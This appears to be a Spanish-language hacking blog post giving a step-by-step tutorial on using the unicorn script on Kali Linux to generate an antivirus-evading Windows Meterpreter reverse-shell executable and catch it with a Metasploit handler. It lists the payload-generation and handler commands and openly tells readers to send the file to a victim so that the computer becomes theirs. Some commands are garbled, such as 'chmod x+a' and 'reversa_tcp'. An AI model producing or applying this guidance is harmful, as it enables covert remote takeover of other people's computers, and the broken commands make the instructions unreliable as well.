Bypass Antivirus con unicorn desde KALI LINUX 2.0 (Hack Windows)

Ayer por la madrugada he estado revisando el mejor SCRIPT para Kali Linux 2.0 y observe que tiene buenas herramientas de hacking. Pero me llamo la atención solo una pero sospecho que fue la madrugada más imaginaria que tuve. Esta herramienta se llama comúnmente como “UNICORN”.  Su nombre te lo dice todo aunque de imaginar lo tiene nada pero es una gran herramienta donde ha burlado algunos antivirus del sistema.
Ejemplo:

Screenshot from 2015-12-29 11:52:54

Lo que más me llamo la atención es que ESET, AVG no lo reconoce o no lo detecta como virus.

Entonces haremos el procedimiento:

Descargamos los siguiente. AQUI o AQUI

Ahora descargamos un archivito. AQUI

Despues de descargar el paquete vamos dar de alta UNICORN.

comandos:

chmod x+a unicorn.sh

En algunos caso no necesitas colocar eso y solo ejecutas con

./unicorn.sh 

Screenshot from 2015-12-29 12:15:32

Observamos los comandos que nos ofrece para hacer nuestro ataque. Donde creerá algunos archivos.

Pero empezaremos con colocar los siguientes comandos:

./unicorn.sh windows/meterpreter/reverse_tcp (IP) 443 nonuac

Te explico rápidamente usaremos un sploit para windows donde el cual vamos a colocar nuestra IP en ifconfig y el puerto dice 443 pero yo recomiendo 8080.

Screenshot from 2015-12-29 12:22:27

Nos aparece un archivo “unicorn.c” el cual vamos a compilar para convertirlo en .exe.
Se preguntarán como lo compilas cread?

Muy fácil vamos a este sitio web aquí.

Screenshot from 2015-12-29 12:25:09

Bueno después de compilar el código descargamos .exe.

Ahora lo que vamos hacer es comandar ese .exe
colocar lo siguiente comandos:

 service postgresql start

para activar la frecuencia del proceso.

 msfconsole

Arrancamos msfconsole.

 use exploit/multi/handler
 set LHOST (IP)
 set LPORT 8080
 set PAYLOADS windows/meterpreter/reversa_tcp
 exploit

Listo nuestro bebe fue creado correctamente ahora envíenselo a su victima con todo su corazón.

Y cuando la victima ejecute como administrador el software la computadora será vuestra para siempre.

Te recomiendo leer esto para hacer más fuerte su ataque AQUI

Screenshot from 2015-12-29 11:20:42
Se olvidaba si quieren escanear sus archivos AQUI y AQUi